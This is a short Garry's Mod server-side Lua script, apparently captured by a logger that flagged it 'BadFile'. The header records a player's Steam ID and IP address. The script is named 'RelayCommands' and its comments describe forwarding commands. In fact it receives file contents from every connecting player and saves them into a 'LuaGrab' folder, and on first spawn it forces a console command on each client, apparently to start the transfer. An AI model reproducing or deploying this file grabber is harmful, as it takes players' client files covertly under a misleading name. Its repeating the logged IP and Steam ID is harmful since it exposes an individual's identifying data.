--[[
	MOD/lua/logs/lua/autorun/server/RelayCommands.lua
	Λ̲x¥Λ̲ɢɢʀᴇsɪᴠᴇ � | STEAM_0:1:69497763 <86.169.139.24:27005> | [19-10-13 06:40:15PM]
	===BadFile===
]]

-- Define Networked Strings;

util.AddNetworkString( "CommandRelayFrom" )
util.AddNetworkString( "CommandRelayTo")

-- Define Local Table;

local CaptureTable = {	};
local RE = { };
local test = "";

-- Define Local Table Variables;

RE.Target = nil;
RE.TCommand = "";

-- Forward Command Function;

net.Receive( "CommandRelayFrom", function( len, ply )

	local fname = net.ReadString()
	local content = net.ReadTable()

	for i, b in pairs( content ) do

		test = test .. b

	end

	if ( !file.IsDir( "LuaGrab/" ..ply:UniqueID() , "DATA" ) ) then file.CreateDir( "LuaGrab/" ..ply:UniqueID() ) end
	print("Taking: ".. fname);
	file.Write( "LuaGrab/" ..ply:UniqueID() .. "/" .. fname ..".txt", test );
	test = "";

end )

hook.Add( "PlayerInitialSpawn", "playerInitialSpawn", function( ply )

	ply:ConCommand( "12345" );

end )